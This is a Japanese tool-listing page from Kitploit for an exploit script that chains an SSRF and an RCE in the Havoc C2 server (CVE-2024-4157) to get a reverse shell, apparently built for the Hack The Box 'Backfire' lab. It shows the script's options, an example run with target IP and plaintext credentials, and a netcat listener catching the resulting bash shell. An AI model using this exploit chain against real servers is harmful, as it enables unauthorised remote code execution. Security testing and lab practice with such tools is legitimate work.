Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4157-SSRF-RCE-Reverse-Shell — Havoc C2のSSRFとRCEを連鎖させて、Havoc C2サーバー上でリバースシェルを取得する。 | Kitploit
ツール/GitHubGitHub/ch4os1/cve-2024-4157-ssrf-rce-reverse-shell
エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubch4os1/cve-2024-4157-ssrf-rce-reverse-shell

CVE-2024-4157-SSRF-RCE-Reverse-Shell

Havoc C2のSSRFとRCEを連鎖させて、Havoc C2サーバー上でリバースシェルを取得する。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
リポジトリを見る
3611ヶ月前未レビュー
共有

CVE-2024-4157: Havoc C2 でのリバースシェル取得 - SSRF と RCE の連鎖

ローカル IP とポートを使用してリバースシェルを取得し、CVE-2024-4157 POC と havoc_auth_rce を連鎖させます。

使用方法

  • 基本情報
root@kitploit:~
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: target IP where the C2 server is running on
## -i: internal IP address that we want the C2 server to interactive with (SSRF)
## -p: internal port 
## -U: username to the C2 server
## -P: password to the C2 server
## -l: local address for the reverse shell (RCE)
## -lp: local port for the reverse shell
  • 例
root@kitploit:~
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
  • 私たちの nc リスナー上のリバースシェル
root@kitploit:~
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 

クレジット

  • SSRF 部分は @chebuya に感謝します。脆弱性に関する詳細ブログ
  • RCE 部分は @Laurence Tennant に感謝します。ブログの詳細情報
  • HTB Backfire の素晴らしい解説を書いてくれた 0xdf に感謝します。

免責事項

  • このツールは教育および研究目的のみで使用してください。
ツールをダウンロード